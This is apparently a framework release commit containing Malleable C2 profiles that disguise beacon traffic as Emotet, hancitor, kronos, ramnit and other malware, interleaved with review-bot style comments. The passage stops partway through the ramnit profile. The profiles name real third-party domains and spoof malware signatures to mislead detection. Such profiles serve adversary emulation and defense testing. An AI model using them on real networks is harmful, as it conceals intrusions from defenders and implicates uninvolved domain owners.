New upstream version 3.7.2
Sophie Brun
3 years ago
0 | 2/5/2021 | |
1 | ------------ | |
2 | - Version 3.7.2 Master Release | |
3 | - Fixed Malleable C2 issue where netbios/netbiosu transformations used excessive resources (@Cx01N) | |
4 | - Fixed error when loading http_hop listener options (@Cx01N) | |
5 | ||
0 | 6 | 1/27/2021 |
7 | ------------ | |
1 | 8 | - Version 3.7.1 Master Release |
2 | 9 | - Added Kali message to main menu |
3 | 10 |
0 | # | |
1 | # Asprox botnet traffic profile | |
2 | # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf | |
3 | # | |
4 | # Author: @harmj0y | |
5 | # | |
6 | set sample_name "Asprox Botnet"; | |
7 | ||
8 | set sleeptime "30000"; # use a ~30s delay between callbacks | |
9 | set jitter "20"; # throw in a 10% jitter | |
10 | set maxdns "255"; | |
11 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"; | |
12 | ||
13 | http-get { | |
14 | ||
15 | set uri "/"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Accept" "*/*"; | |
20 | header "Content-Type" "application/x-www-form-urlencoded"; | |
21 | header "Content-Transfer-Encoding" "base64"; | |
22 | header "Connection" "Keep-Alive"; | |
23 | ||
24 | metadata { | |
25 | netbiosu; | |
26 | uri-append; | |
27 | } | |
28 | } | |
29 | ||
30 | server { | |
31 | ||
32 | header "Server" "nginx/1.2.5"; | |
33 | header "Content-Type" "text/html"; | |
34 | header "X-Powered-By" "PHP/5.4.4-7"; | |
35 | header "Vary" "Accept-Encoding"; | |
36 | ||
37 | output { | |
38 | base64; | |
39 | print; | |
40 | } | |
41 | } | |
42 | } | |
43 | ||
44 | http-post { | |
45 | ||
46 | # random hash to try to simulate the post uri in the report | |
47 | set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1"; | |
48 | ||
49 | client { | |
50 | ||
51 | header "Accept" "*/*"; | |
52 | header "Content-Type" "application/x-www-form-urlencoded"; | |
53 | header "Content-Transfer-Encoding" "base64"; | |
54 | header "Connection" "Keep-Alive"; | |
55 | ||
56 | id { | |
57 | parameter "id"; | |
58 | } | |
59 | ||
60 | output { | |
61 | base64; | |
62 | print; | |
63 | } | |
64 | } | |
65 | ||
66 | server { | |
67 | ||
68 | header "Server" "nginx/1.2.5"; | |
69 | header "Content-Type" "text/html"; | |
70 | header "X-Powered-By" "PHP/5.4.4-7"; | |
71 | header "Vary" "Accept-Encoding"; | |
72 | ||
73 | output { | |
74 | base64; | |
75 | print; | |
76 | } | |
77 | } | |
78 | } | |
79 |
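Review bot: The comment on `set jitter "20"; # throw in a 10% jitter` near the top of the Asprox profile disagrees with the value it annotates, so a reader cannot tell whether 10 or 20 was intended. Either the comment becomes `set jitter "20"; # throw in a 20% jitter` or the value becomes `"10"`, which is what the two Fiesta profiles in this commit use together with the same "10% jitter" wording. The `set sleeptime "30000"; # use a ~30s delay between callbacks` line above it is consistent and can stay.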
0 | #emotet | |
1 | #mostly taken from --> http://www.broadanalysis.com/2017/08/14/emotet-banking-trojan-2017-08-14-malspam/ | |
2 | #found this regarding the encoded 'cookie' string --> https://www.cisecurity.org/emotet-changes-ttp-and-arrives-in-united-states/ | |
3 | #xx0hcd | |
4 | ||
5 | ||
6 | set sleeptime "30000"; | |
7 | set jitter "20"; | |
8 | set useragent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0)"; | |
9 | set dns_idle "8.8.8.8"; | |
10 | set maxdns "235"; | |
11 | ||
12 | ||
13 | http-get { | |
14 | ||
15 | set uri "/LSnmkxT/"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Host" "trevorcameron.com"; | |
20 | header "Connection" "Keep-Alive"; | |
21 | ||
22 | ||
23 | metadata { | |
24 | netbios; | |
25 | header "Cookie"; | |
26 | ||
27 | ||
28 | } | |
29 | ||
30 | ||
31 | } | |
32 | ||
33 | server { | |
34 | ||
35 | header "Server" "Apache"; | |
36 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; | |
37 | header "Pragma" "no-cache"; | |
38 | header "Content-Disposition" "attachment; filename='NFccF.exe'"; | |
39 | header "Content-Transfer-Encoding" "binary"; | |
40 | header "Keep-Alive" "timeout=2, max=100"; | |
41 | header "Connection" "Keep-Alive"; | |
42 | ||
43 | ||
44 | output { | |
45 | netbios; | |
46 | ||
47 | prepend "11f10 | |
48 | MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. | |
49 | ||
50 | $.......h.+.,OE.,OE.,OE..... OE......OE.....1OE...F.:[email protected].%7..%OE.,OD.[OE...L.-OE.....-OE...G.-OE.Rich,OE.........PE..L......Y.............................]."; | |
51 | ||
52 | append "9(90989<9D9X9x9.9.9.9.9.: :@:`:.:.:.:.:.:.:.;(;H;h;.;.;.;.;.;.<(<H<h<.<.<.<.<.=(=H=h=.=.=.=.=.=.>(>D>H>P>X>`>t>|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.? ?4?<?P?..........p1t1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1(2X2h2x2.2.2.2.2.2.2.2.2p3t3.8.9.9.9.:0:P:h:.:.:.:.;0;;x;.;.;.;.;.<D<h<.<.<.<(=D=d=.=.=.=.>........................................................................................................................................................................................................................................................................................................ | |
53 | 0"; | |
54 | print; | |
55 | } | |
56 | } | |
57 | } | |
58 | ||
59 | http-post { | |
60 | ||
61 | set uri "/LSnmkXT/"; | |
62 | ||
63 | client { | |
64 | ||
65 | header "Host" "77.244.37:7080"; | |
66 | header "Connection" "Keep-Alive"; | |
67 | header "Cache-Control" "no-cache"; | |
68 | ||
69 | output { | |
70 | netbios; | |
71 | print; | |
72 | ||
73 | } | |
74 | ||
75 | #not sure where to stick this to look good... | |
76 | id { | |
77 | base64url; | |
78 | header "Cookie"; | |
79 | ||
80 | } | |
81 | } | |
82 | ||
83 | server { | |
84 | ||
85 | header "Server" "nginx"; | |
86 | header "Content-Type" "text/html; charset=UTF-8"; | |
87 | header "Connection" "keep-alive"; | |
88 | ||
89 | ||
90 | output { | |
91 | netbios; | |
92 | print; | |
93 | } | |
94 | } | |
95 | } | |
96 | ||
97 | http-stager { | |
98 | ||
99 | set uri_x86 "/ckgawd/"; | |
100 | set uri_x64 "/Ckgawd/"; | |
101 | ||
102 | client { | |
103 | header "Host" "blushphotoandfilm.com"; | |
104 | header "Connection" "Keep-Alive"; | |
105 | } | |
106 | ||
107 | server { | |
108 | header "Cache-Control" "Cache-Control: no-cache, no-store, max-age=0, must-revalidate"; | |
109 | header "Content-Type" "application/octet-stream"; | |
110 | header "Server" "Apache"; | |
111 | header "Connection" "Keep-Alive"; | |
112 | ||
113 | } | |
114 | ||
115 | ||
116 | } | |
117 | #from link in doc --> https://www.virustotal.com/#/file/17ced37ec7b9a02b142f5ca527e1bba05c723231b3d4fc1a951e45ec002a17e5/details | |
118 | stage { | |
119 | set compile_time "11 Nov 2010 23:29:33"; | |
120 | set userwx "false"; | |
121 | set image_size_x86 "298000"; | |
122 | ||
123 | #some dll names seen by --> https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Emotet.N!bit | |
124 | transform-x86 { | |
125 | strrep "beacon.dll" "api32.dll"; | |
126 | } | |
127 | ||
128 | transform-x64 { | |
129 | strrep "beacon.x64.dll" "mgr32.dll"; | |
130 | } | |
131 | ||
132 | #https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Emotet.yar | |
133 | stringw "{ 4d 5a }"; | |
134 | stringw "{ 0f 45 fb 0f 45 de }"; | |
135 | stringw "{ C7 04 24 00 00 00 00 89 44 24 0? }"; | |
136 | stringw "{ 89 E? 8D ?? 24 ?? 89 ?? FF D0 83 EC 04 }"; | |
137 | ||
138 | } |
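Review bot: The `header "Host" "trevorcameron.com"`, `header "Host" "77.244.37:7080"` and `header "Host" "blushphotoandfilm.com"` values in the http-get, http-post and http-stager client blocks are lifted verbatim from the referenced analysis, and nothing in the file says so; a profile loaded as-is emits traffic naming domains that belong to uninvolved third parties. A comment under the file header such as `# Host and URI values are copied from the referenced report for illustration only; they name third-party infrastructure and must be replaced with hosts you control` would make that explicit. The same undocumented third-party Host values appear in the GlobeImposter, hancitor, kronos, ramnit, rigEK and saefko profiles in this commit. Separately, the `prepend "11f10 ... MZ......` value in the http-get server output is the report's printable rendering of a PE header (non-printable bytes shown as `.`, split across several physical lines), and a `# printable transcription of the sample's DOS/PE header, not the original bytes` comment would stop a reader from treating it as byte-accurate.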
0 | # | |
1 | # Fiesta Exploit Kit traffic profile | |
2 | # http://malware-traffic-analysis.net/2014/04/05/index.html | |
3 | # | |
4 | # Author: @harmj0y | |
5 | # | |
6 | ||
7 | set sleeptime "30000"; # use a ~30s delay between callbacks | |
8 | set jitter "10"; # throw in a 10% jitter | |
9 | set maxdns "255"; | |
10 | set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11"; | |
11 | ||
12 | http-get { | |
13 | ||
14 | set uri "/rmvk30g/"; | |
15 | ||
16 | client { | |
17 | # mimic this Fiesta instance's header information | |
18 | header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"; | |
19 | header "Connection" "keep-alive"; | |
20 | ||
21 | # encode session metadata as close as we can to a Fiesta URI request | |
22 | metadata { | |
23 | netbios; | |
24 | append ";1;4;1"; | |
25 | uri-append; | |
26 | } | |
27 | } | |
28 | ||
29 | server { | |
30 | header "Server" "Apache/2.2.15 (CentOS)"; | |
31 | header "X-Powered-By" "PHP/5.3.27"; | |
32 | header "Content-Type" "application/octet-stream"; | |
33 | header "Connection" "close"; | |
34 | ||
35 | output { | |
36 | print; | |
37 | } | |
38 | } | |
39 | } | |
40 | ||
41 | http-post { | |
42 | ||
43 | set uri "/"; | |
44 | ||
45 | client { | |
46 | ||
47 | # fake out a different user agent for the post back | |
48 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)"; | |
49 | ||
50 | id { | |
51 | netbios; | |
52 | uri-append; | |
53 | } | |
54 | ||
55 | output { | |
56 | base64; | |
57 | print; | |
58 | } | |
59 | } | |
60 | ||
61 | server { | |
62 | header "Server" "nginx/1.4.2"; | |
63 | header "Content-Type" "text/html"; | |
64 | header "Connection" "close"; | |
65 | ||
66 | output { | |
67 | base64; | |
68 | print; | |
69 | } | |
70 | } | |
71 | } | |
72 |
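Review bot: This Fiesta profile never sets `sample_name`, whereas the second Fiesta profile in this commit has `set sample_name "Fiesta Exploit Kit";` and the Asprox profile sets one as well; if the name is what identifies a profile in listings or lint output (not visible here), this one reports an empty name and the pair is hard to tell apart. Add a distinct value after the header, e.g. `set sample_name "Fiesta Exploit Kit (Java UA variant)";`. The `# fake out a different user agent for the post back` comment on the http-post User-Agent already explains why it differs from the global `useragent`, which is the level of documentation the rest of the file should match.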
0 | # | |
1 | # A second Fiesta Exploit Kit traffic profile | |
2 | # http://malware-traffic-analysis.net/2014/04/05/index.html | |
3 | # | |
4 | # Author: @harmj0y | |
5 | # | |
6 | set sample_name "Fiesta Exploit Kit"; | |
7 | ||
8 | set sleeptime "30000"; # use a ~30s delay between callbacks | |
9 | set jitter "10"; # throw in a 10% jitter | |
10 | set maxdns "255"; | |
11 | ||
12 | http-get { | |
13 | ||
14 | set uri "/v20idaf/"; | |
15 | ||
16 | client { | |
17 | # mimic this Fiesta instance's header information | |
18 | header "Accept" "*/*"; | |
19 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; | |
20 | ||
21 | # encode session metadata as close as we can to a Fiesta URI request | |
22 | metadata { | |
23 | netbios; | |
24 | append ";112202;228"; | |
25 | uri-append; | |
26 | } | |
27 | } | |
28 | ||
29 | server { | |
30 | header "Server" "nginx/1.4.4"; | |
31 | header "Content-Type" "application/octet-stream"; | |
32 | header "Connection" "close"; | |
33 | ||
34 | output { | |
35 | print; | |
36 | } | |
37 | } | |
38 | } | |
39 | ||
40 | http-post { | |
41 | ||
42 | set uri "/"; | |
43 | ||
44 | client { | |
45 | ||
46 | header "Accept" "*/*"; | |
47 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; | |
48 | ||
49 | id { | |
50 | netbios; | |
51 | uri-append; | |
52 | } | |
53 | ||
54 | output { | |
55 | base64; | |
56 | print; | |
57 | } | |
58 | } | |
59 | ||
60 | server { | |
61 | header "Server" "nginx/1.4.4"; | |
62 | header "Content-Type" "application/octet-stream"; | |
63 | header "Connection" "close"; | |
64 | ||
65 | output { | |
66 | print; | |
67 | } | |
68 | } | |
69 | } | |
70 |
0 | #GlobeImposter ransomware | |
1 | #taken from --> http://www.malware-traffic-analysis.net/2017/11/30/index.html | |
2 | #xx0hcd | |
3 | ||
4 | set sleeptime "30000"; | |
5 | set jitter "20"; | |
6 | set useragent "Mozilla Firefox/4.0(compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0;SLC2; .NET CLD 3.5.30729; Media Center PC 6.0;)"; | |
7 | set dns_idle "8.8.8.8"; | |
8 | set maxdns "235"; | |
9 | ||
10 | ||
11 | http-get { | |
12 | ||
13 | set uri "/JHGcd476334"; | |
14 | ||
15 | client { | |
16 | ||
17 | header "Accept" "*/*"; | |
18 | header "Accept-Encoding" "gzip, deflate"; | |
19 | header "Host" "awholeblueworld.com"; | |
20 | header "Connection" "Keep-Alive"; | |
21 | ||
22 | ||
23 | metadata { | |
24 | base64url; | |
25 | header "Cookie"; | |
26 | ||
27 | } | |
28 | ||
29 | ||
30 | } | |
31 | ||
32 | server { | |
33 | ||
34 | header "Server" "nginx"; | |
35 | header "Content-Type" "text/plain"; | |
36 | header "Connection" "keep-alive"; | |
37 | header "Vary" "Accept-Encoding"; | |
38 | header "X-Powered-By" "PleskLin"; | |
39 | header "Content-Encoding" "gzip"; | |
40 | ||
41 | ||
42 | output { | |
43 | ||
44 | netbios; | |
45 | prepend "500a ...............|T..?~.G..a.I H. AQ...J..."; | |
46 | print; | |
47 | } | |
48 | } | |
49 | } | |
50 | ||
51 | http-post { | |
52 | set verb "GET"; | |
53 | set uri "/count.php"; | |
54 | ||
55 | client { | |
56 | ||
57 | header "Accept" "*/*"; | |
58 | header "Accept-Encoding" "gzip, deflate"; | |
59 | header "Host" "awholeblueworld.com"; | |
60 | header "Connection" "Keep-Alive"; | |
61 | ||
62 | output { | |
63 | base64url; | |
64 | parameter "nu"; | |
65 | ||
66 | ||
67 | ||
68 | } | |
69 | ||
70 | ||
71 | id { | |
72 | base64url; | |
73 | parameter "fb"; | |
74 | ||
75 | } | |
76 | ||
77 | # parameter "fb" "110"; | |
78 | ||
79 | } | |
80 | ||
81 | server { | |
82 | ||
83 | header "Server" "nginx"; | |
84 | header "Content-Type" "text/plain"; | |
85 | header "Connection" "keep-alive"; | |
86 | header "Vary" "Accept-Encoding"; | |
87 | header "X-Powered-By" "PleskLin"; | |
88 | header "Content-Encoding" "gzip"; | |
89 | ||
90 | ||
91 | output { | |
92 | netbios; | |
93 | prepend "500a ...............|T..?~.G..a.I H. AQ...J..."; | |
94 | print; | |
95 | } | |
96 | ||
97 | } | |
98 | } | |
99 | ||
100 | http-stager { | |
101 | ||
102 | set uri_x86 "/JHGCd476334"; | |
103 | set uri_x64 "/JHGcD476334"; | |
104 | ||
105 | ||
106 | client { | |
107 | ||
108 | header "Host" "awholeblueworld"; | |
109 | header "Connection" "keep-alive"; | |
110 | ||
111 | } | |
112 | ||
113 | server { | |
114 | ||
115 | header "Server" "nginx"; | |
116 | header "Content-Type" "text/plain"; | |
117 | header "Connection" "keep-alive"; | |
118 | header "Vary" "Accept-Encoding"; | |
119 | header "X-Powered-By" "PleskLin"; | |
120 | header "Content-Encoding" "gzip"; | |
121 | ||
122 | ||
123 | output { | |
124 | ||
125 | print; | |
126 | } | |
127 | ||
128 | } | |
129 | ||
130 | ||
131 | } | |
132 | ||
133 | stage { | |
134 | set userwx "true"; | |
135 | set compile_time "03 Feb 2016 09:17:32"; | |
136 | set image_size_x86 "448012"; | |
137 | set image_size_x64 "448012"; | |
138 | #set obfuscate "true"; | |
139 | } |
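Review bot: The http-post client block keeps a commented-out `# parameter "fb" "110";` directly after an `id` block that already writes `parameter "fb"`, and the stage block ends in `#set obfuscate "true";`; both are dead configuration with no explanation, so the next reader cannot tell leftovers from deliberate toggles. Delete them, or give each a one-line comment stating why it is disabled. The http-stager `header "Host" "awholeblueworld"` also differs from the `"awholeblueworld.com"` used by the http-get and http-post client blocks; a comment should say whether that is intentional or a truncation, since the rest of the file gives no hint.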
0 | #hancitor | |
1 | #taken from --> http://www.malware-traffic-analysis.net/2017/12/20/index.html | |
2 | #xx0hcd | |
3 | ||
4 | ||
5 | set sleeptime "30000"; | |
6 | set jitter "20"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko)"; | |
8 | set dns_idle "8.8.8.8"; | |
9 | set maxdns "235"; | |
10 | ||
11 | ||
12 | http-get { | |
13 | ||
14 | set uri "/mlu/forum.php"; | |
15 | ||
16 | client { | |
17 | ||
18 | header "Host" "arrepsinrab.com"; | |
19 | header "Accept" "*/*"; | |
20 | header "Accept-Encoding" "identity, *;q=0"; | |
21 | header "Accept-Language" "en-US"; | |
22 | header "Content-Type" "application/octet-stream"; | |
23 | header "Connection" "close"; | |
24 | header "Content-Encoding" "binary"; | |
25 | ||
26 | ||
27 | metadata { | |
28 | netbios; | |
29 | header "Cookie"; | |
30 | ||
31 | ||
32 | } | |
33 | ||
34 | ||
35 | } | |
36 | ||
37 | server { | |
38 | ||
39 | header "Server" "nginx/1.10.2"; | |
40 | header "Content-Type" "text/html"; | |
41 | header "Keep-Alive" "timeout=2, max=100"; | |
42 | header "Connection" "close"; | |
43 | header "X-Powered-By" "PHP/5.4.45"; | |
44 | ||
45 | ||
46 | output { | |
47 | netbios; | |
48 | print; | |
49 | } | |
50 | } | |
51 | } | |
52 | ||
53 | http-post { | |
54 | ||
55 | set uri "/ls5/forum.php"; | |
56 | ||
57 | client { | |
58 | ||
59 | header "Accept" "*/*"; | |
60 | header "Content-Type" "application/x-www-form-urlencoded"; | |
61 | header "Host" "gedidnundno.com"; | |
62 | header "Cache-Control" "no-cache"; | |
63 | ||
64 | output { | |
65 | netbios; | |
66 | print; | |
67 | ||
68 | } | |
69 | ||
70 | ||
71 | id { | |
72 | netbiosu; | |
73 | header "GUID"; | |
74 | ||
75 | } | |
76 | } | |
77 | ||
78 | server { | |
79 | ||
80 | header "Server" "nginx/1.10.2"; | |
81 | header "Content-Type" "text/html"; | |
82 | header "Transfer-Encoding" "chunked"; | |
83 | header "Connection" "keep-alive"; | |
84 | header "X-Powered-By" "PHP/5.4.45"; | |
85 | ||
86 | ||
87 | output { | |
88 | netbios; | |
89 | print; | |
90 | } | |
91 | } | |
92 | } | |
93 | ||
94 | http-stager { | |
95 | ||
96 | set uri_x86 "/lS5/forum.php"; | |
97 | set uri_x64 "/ls5/Forum.php"; | |
98 | ||
99 | client { | |
100 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
101 | header "Accept-Language" "en-US"; | |
102 | header "Host" "acamonitoringltd.ca"; | |
103 | header "Connection" "Keep-Alive"; | |
104 | } | |
105 | ||
106 | server { | |
107 | header "Server" "nginx"; | |
108 | header "Content-Type" "application/msword;"; | |
109 | header "Keep-Alive" "timeout=2, max=100"; | |
110 | header "Connection" "Keep-Alive"; | |
111 | header "X-Powered-By" "PHP/5.3.3"; | |
112 | header "Content-Disposition" "attachment; filename=fax_286509.doc"; | |
113 | header "Pragma" "private"; | |
114 | ||
115 | } | |
116 | ||
117 | ||
118 | } | |
119 | ||
120 | stage { | |
121 | #random | |
122 | set compile_time "15 Nov 2017 12:24:14"; | |
123 | set userwx "false"; | |
124 | set image_size_x86 "301000"; | |
125 | ||
126 | #https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html | |
127 | transform-x86 { | |
128 | strrep "beacon.dll" "pm.dll"; | |
129 | } | |
130 | ||
131 | transform-x64 { | |
132 | strrep "beacon.x64.dll" "PM.dll"; | |
133 | } | |
134 | ||
135 | #https://github.com/Yara-Rules/rules/blob/d1da9c002d1d00045f53ea1502cfcc7dd43c115e/Malicious_Documents/Maldoc_hancitor_dropper | |
136 | stringw "{ 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 }"; | |
137 | stringw "{ 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 }"; | |
138 | stringw "{ 00 43 61 6C 6C 57 69 6E 64 6F 77 50 72 6F 63 41 00 }"; | |
139 | stringw "{ 50 4F 4C 41 }"; | |
140 | ||
141 | } |
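Review bot: The `#random` line above `set compile_time "15 Nov 2017 12:24:14";` in the stage block is too terse to tell a reader that the timestamp is invented rather than taken from a sample, in contrast to the Emotet profile (VirusTotal link on its stage block) and the kronos profile (`#from peclone`) in the same commit. Expand it to `# compile_time is an arbitrary date, not taken from the analysed sample`, or cite the source if there is one. The `transform-x86`/`transform-x64` and `stringw` entries are already sourced by the FireEye and Yara-Rules links, which is the standard the rest of the block should meet.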
0 | #kronos | |
1 | #https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/ | |
2 | #https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/ | |
3 | #https://www.hybrid-analysis.com/sample/8389dd850c991127f3b3402dce4201cb693ec0fb7b1e7663fcfa24ef30039851?environmentId=100 | |
4 | #xx0hcd | |
5 | ||
6 | ||
7 | set sleeptime "30000"; | |
8 | set jitter "20"; | |
9 | set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36"; | |
10 | set dns_idle "8.8.8.8"; | |
11 | set maxdns "235"; | |
12 | ||
13 | ||
14 | http-get { | |
15 | ||
16 | set uri "/lampi/upload/38bacf4f.exe"; | |
17 | ||
18 | client { | |
19 | ||
20 | header "Host" "hjbkjbhkjhbkjhl.info"; | |
21 | ||
22 | ||
23 | metadata { | |
24 | base64url; | |
25 | prepend "PHPSESSID="; | |
26 | header "Cookie"; | |
27 | ||
28 | } | |
29 | ||
30 | } | |
31 | ||
32 | server { | |
33 | ||
34 | header "Server" "nginx/1.10.2"; | |
35 | header "Content-Type" "application/octet-stream"; | |
36 | header "Connection" "close"; | |
37 | header "ETag" "2ca0669-6d600-557bba73d8218"; | |
38 | header "Accept-Ranges" "bytes"; | |
39 | ||
40 | output { | |
41 | ||
42 | netbios; | |
43 | prepend "MZ....................@..........................!......L..!This Program cannot be run in DOS mode.$...................~........:.....:.....:.....7.{.-...7.D.H..7.E..."; | |
44 | ||
45 | print; | |
46 | } | |
47 | } | |
48 | } | |
49 | ||
50 | http-post { | |
51 | ||
52 | set uri "/lampi/connect.php"; | |
53 | ||
54 | client { | |
55 | ||
56 | header "Host" "hjbkjbhkjhbkjhl.info"; | |
57 | header "Cache-Control" "no-cache"; | |
58 | ||
59 | output { | |
60 | base64url; | |
61 | prepend "PHPSESSID="; | |
62 | ||
63 | header "Cookie"; | |
64 | ||
65 | ||
66 | } | |
67 | ||
68 | ||
69 | id { | |
70 | base64url; | |
71 | parameter "a"; | |
72 | ||
73 | } | |
74 | } | |
75 | ||
76 | server { | |
77 | ||
78 | header "Server" "nginx/1.10.2"; | |
79 | header "Content-Type" "text/html; charset=windows-1251"; | |
80 | header "X-Powered-By" "PHP/5.3.3"; | |
81 | header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0"; | |
82 | header "Pragma" "non-cache"; | |
83 | ||
84 | ||
85 | output { | |
86 | netbios; | |
87 | ||
88 | print; | |
89 | } | |
90 | } | |
91 | } | |
92 | ||
93 | http-stager { | |
94 | ||
95 | set uri_x86 "/lampi/Connect.php"; | |
96 | set uri_x64 "/Lampi/connect.php"; | |
97 | ||
98 | client { | |
99 | header "Host" "hjbkjbhkjhbkjhl.info"; | |
100 | header "Cache-Control" "no-cache"; | |
101 | } | |
102 | ||
103 | server { | |
104 | header "Server" "nginx/1.10.2"; | |
105 | header "Content-Type" "text/html; charset=windows-1251"; | |
106 | header "X-Powered-By" "PHP/5.3.3"; | |
107 | header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0"; | |
108 | header "Pragma" "non-cache"; | |
109 | ||
110 | } | |
111 | ||
112 | ||
113 | } | |
114 | ||
115 | ||
116 | ||
117 | #from peclone | |
118 | stage { | |
119 | set checksum "0"; | |
120 | set compile_time "23 Aug 2017 10:19:26"; | |
121 | set entry_point "37713"; | |
122 | set image_size_x86 "495616"; | |
123 | set image_size_x64 "495616"; | |
124 | set rich_header "\x07\x4f\x6b\x48\x43\x2e\x05\x1b\x43\x2e\x05\x1b\x43\x2e\x05\x1b\xf7\xb2\xf4\x1b\x49\x2e\x05\x1b\xf7\xb2\xf6\x1b\xc2\x2e\x05\x1b\xf7\xb2\xf7\x1b\x5a\x2e\x05\x1b\x78\x70\x06\x1a\x51\x2e\x05\x1b\x78\x70\x01\x1a\x51\x2e\x05\x1b\x78\x70\x00\x1a\x66\x2e\x05\x1b\x4a\x56\x96\x1b\x44\x2e\x05\x1b\x43\x2e\x04\x1b\x21\x2e\x05\x1b\xd4\x70\x0c\x1a\x42\x2e\x05\x1b\xd1\x70\xfa\x1b\x42\x2e\x05\x1b\xd4\x70\x07\x1a\x42\x2e\x05\x1b\x52\x69\x63\x68\x43\x2e\x05\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
125 | } | |
126 | ||
127 | ||
128 |
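Review bot: `header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0";` and `header "Pragma" "non-cache";` in both the http-post and http-stager server blocks use the token `non-cache`, which is not an HTTP directive (the standard one is `no-cache`), and nothing says whether this is a typo or reproduced from the analysed sample. If it is deliberate, a `# 'non-cache' is as observed in the sample, not a typo` comment on the first occurrence prevents a maintainer from silently "correcting" it; if it is not, it should be fixed in all four header lines at once. The rigEK http-stager client `header "Pragma" "non-cache";` in this commit has the same unexplained token.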
0 | #ramnit trojan | |
1 | #combines traffic seen from seamless campaign | |
2 | #taken from --> https://malwarebreakdown.com/2018/01/16/rig-exploit-kit-delivers-ramnit-banking-trojan-via-seamless-malvertising-campaign/ | |
3 | #xx0hcd | |
4 | ||
5 | ||
6 | set sleeptime "30000"; | |
7 | set jitter "20"; | |
8 | set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko)"; | |
9 | set dns_idle "8.8.8.8"; | |
10 | set maxdns "235"; | |
11 | ||
12 | ||
13 | http-get { | |
14 | ||
15 | set uri "/redirect"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
20 | header "Accept-Language" "en-US"; | |
21 | header "Accept-Encoding" "gzip, deflate"; | |
22 | header "Host" "redirect.turself-josented.com"; | |
23 | header "Connection" "Keep-Alive"; | |
24 | ||
25 | ||
26 | ||
27 | metadata { | |
28 | netbios; | |
29 | parameter "target"; | |
30 | ||
31 | ||
32 | } | |
33 | ||
34 | ||
35 | } | |
36 | ||
37 | server { | |
38 | ||
39 | header "Server" "nginx"; | |
40 | header "Content-Type" "text/html;charset=UTF-8"; | |
41 | header "Connection" "keep-alive"; | |
42 | header "Cache-Control" "no-store, no-cache, pre-check=0, post-check=0"; | |
43 | header "Expires" "Thu, 01 Jan 1970 00:00:00 GMT"; | |
44 | header "Pragma" "no-cache"; | |
45 | ||
46 | ||
47 | output { | |
48 | base64; | |
49 | prepend "105"; | |
50 | prepend "<html><head><link rel=\"icon\" type=\"image/gif\" href=\"data:image/gif;base64,"; | |
51 | ||
52 | append "\"/><meta http-equiv=\"refresh\" content=\"0;URL='http://xn-b1aanbboc3ad8jee4bff.xn--p1ai/gav4.php'\" /></head><body></body></html>"; | |
53 | ||
54 | print; | |
55 | } | |
56 | } | |
57 | } | |
58 | ||
59 | http-post { | |
60 | ||
61 | set uri "/Redirect.php"; | |
62 | ||
63 | client { | |
64 | ||
65 | header "Accept" "*/*"; | |
66 | # header "Content-Type" "application/x-www-form-urlencoded"; | |
67 | # header "X-Requested-With" "XMLHttpRequest"; | |
68 | header "Referer" "http://........../redirect.php?acsc=93042904"; | |
69 | header "Accept-Language" "en-US"; | |
70 | header "Host" "xn--b1aanbboc3ad8jee4bff.xn--p1ai"; | |
71 | # header "Connection" "Keep-Alive"; | |
72 | ||
73 | output { | |
74 | netbios; | |
75 | print; | |
76 | ||
77 | } | |
78 | ||
79 | ||
80 | id { | |
81 | netbios; | |
82 | prepend "http://........../redirect.php?acsc="; | |
83 | header "Referer"; | |
84 | ||
85 | } | |
86 | } | |
87 | ||
88 | server { | |
89 | ||
90 | header "Server" "nginx"; | |
91 | header "Content-Type" "text/html, charset=UTF-8"; | |
92 | header "Connection" "keep-alive"; | |
93 | header "Vary" "Accept-Encoding"; | |
94 | header "X-Powered-By" "PHP/5.6.30"; | |
